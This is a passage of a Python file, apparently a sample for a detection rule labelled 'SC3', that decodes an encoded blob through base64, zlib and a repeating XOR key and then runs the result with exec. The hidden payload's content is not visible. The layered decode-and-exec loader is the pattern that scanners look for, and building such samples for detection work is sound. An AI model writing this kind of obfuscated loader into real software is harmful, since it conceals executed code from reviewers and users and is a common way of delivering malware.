zViZDMzBmIT/5LsT0+kIkuQ6MqG3CiA+JtGlmfyduOVR+Si1683l6z+uAFJpDG3f7ksO6Vke5+I/PSaptNXnfwCuTlZt"
_K = bytes.fromhex("02c5d91304fad8fad95ae1b4")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
